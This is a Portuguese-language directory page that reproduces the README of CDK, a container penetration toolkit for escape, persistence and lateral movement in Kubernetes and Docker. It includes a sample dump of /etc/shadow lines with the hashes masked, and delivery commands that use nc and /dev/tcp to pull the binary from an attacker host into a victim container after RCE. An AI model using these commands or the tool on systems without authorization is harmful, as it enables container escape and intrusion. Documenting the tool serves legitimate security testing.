Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CDK — 📦 Torne mais fácil os testes de segurança de K8s, Docker e Containerd. | Kitploit
Ferramentas/GitHubGitHub/cdk-team/cdk
Escalada de PrivilégiosReconhecimentoSegurança de ContêineresMecanismos de PersistênciaExploraçãoMovimento LateralPós-ExploraçãoTestes de PenetraçãoSegurança na NuvemEscape de ContêinerTop em Escape de Contêiner nº2
4.7k60665há 5 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHubcdk-team/cdk

CDK

📦 Torne mais fácil os testes de segurança de K8s, Docker e Containerd.

Ver RepositórioSite

CDK - Kit de Penetração em Contêineres com Zero Dependência

Inglês | 简体中文

png

Aviso Legal

O uso do CDK para atacar alvos sem consentimento mútuo prévio é ilegal. O CDK é apenas para fins de teste de segurança.

Visão Geral

O CDK é um kit de ferramentas de penetração em contêineres de código aberto, projetado para oferecer exploração estável em diferentes contêineres reduzidos sem qualquer dependência de SO. Ele vem com ferramentas de rede úteis e muitos PoCs/EXPs poderosos e ajuda a escapar do contêiner e assumir o controle do cluster K8s facilmente.

Início Rápido

Execute cdk eva para obter informações de avaliação e um exploit recomendado, depois execute cdk run para iniciar o ataque.

> ./cdk eva --full

[*] Talvez você possa explorar as *Capabilities* abaixo:
[!] CAP_DAC_READ_SEARCH ativada. Você pode ler arquivos do host. Use 'cdk run cap-dac-read-search' ... para exploração.
[!] CAP_SYS_MODULE ativada. Você pode escapar do contêiner carregando módulo do kernel. Mais informações em https://xcellerator.github.io/posts/docker_escape/.
Crítico - CAP_SYS_ADMIN encontrada. Tente 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Crítico - Possível Contêiner Privilegiado Encontrado.

> ./cdk run cap-dac-read-search

Executando com alvo: /etc/shadow, referência: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

Instalação/Entrega

Baixe o último lançamento em https://github.com/cdk-team/CDK/releases/

Coloque os arquivos executáveis no contêiner alvo e comece os testes.

DICAS: Entregar CDK no contêiner alvo em testes de penetração reais

Se você tem um exploit que pode enviar um arquivo, então você pode enviar o binário CDK diretamente.

Se você tem um exploit RCE, mas o contêiner alvo não possui curl ou wget, você pode usar o seguinte método para entregar o CDK:

  1. Primeiro, hospede o binário CDK no seu host com IP público.
(no seu host)
nc -lvp 999 < cdk
  1. Dentro do contêiner vítima execute
cat < /dev/tcp/(seu_ip_host_público)/(porta) > cdk
chmod a+x cdk

Uso

Uso:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Avaliar:
  cdk evaluate                              Coletar informações para encontrar fraquezas dentro do contêiner.
  cdk evaluate --full                       Ativar varredura de arquivos durante a coleta de informações.

Exploit:
  cdk run --list                            Listar todos os exploits disponíveis.
  cdk run <exploit> [<args>...]             Executar um único exploit, docs em https://github.com/cdk-team/CDK/wiki

Ferramenta:
  vi <file>                                 Editar arquivos no contêiner como o comando "vi".
  ps                                        Mostrar informações de processos como o comando "ps -ef".
  nc [options]                              Criar túnel TCP.
  ifconfig                                  Mostrar informações de rede.
  kcurl <path> (get|post) <uri> <data>      Fazer requisição ao api-server K8s.
  ectl <endpoint> get <key>                 Enumeração não autorizada de chaves ectd.
  ucurl (get|post) <socket> <uri> <data>    Fazer requisição ao socket unix do Docker.
  probe <ip> <port> <parallel> <timeout-ms> Varredura de porta TCP, exemplo: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Opções:
  -h --help     Mostrar esta mensagem de ajuda.
  -v --version  Mostrar versão.
  --profile=<nome> Selecionar perfil de avaliação.

Funcionalidades

O CDK tem três módulos:

  1. Avaliar: coletar informações dentro do contêiner para encontrar potenciais fraquezas.
  2. Exploit: para escapar do contêiner, persistência e movimento lateral
  3. Ferramenta: ferramentas de rede e APIs para requisições TCP/HTTP, túneis e gerenciamento de cluster K8s.

Módulo de Avaliação

Uso

cdk evaluate [--full]
TáticaScriptSuportadoUso/Exemplo
Coleta de InformaçõesInformações Básicas do SO✔link
Coleta de InformaçõesCapabilities Disponíveis✔link
Coleta de InformaçõesComandos Linux Disponíveis✔link
Coleta de InformaçõesMontagens✔link
Coleta de InformaçõesNamespace de Rede✔link
Coleta de InformaçõesENV Sensíveis✔link
Coleta de InformaçõesProcessos Sensíveis✔link
Coleta de InformaçõesArquivos Locais Sensíveis✔link
Coleta de InformaçõesKube-proxy Route Localnet(CVE-2020-8558)✔link
Coleta de InformaçõesDescoberta de Serviços Baseada em DNS✔link
DescobertaInformações do Api-server K8s✔link
DescobertaInformações da Service-account K8s✔link
DescobertaAPI de Metadados do Provedor de Nuvem✔link

Módulo de Exploit

Listar todos os exploits disponíveis:

cdk run --list

Executar exploit específico:

cdk run <nome-do-script> [opções]
Baixar ferramenta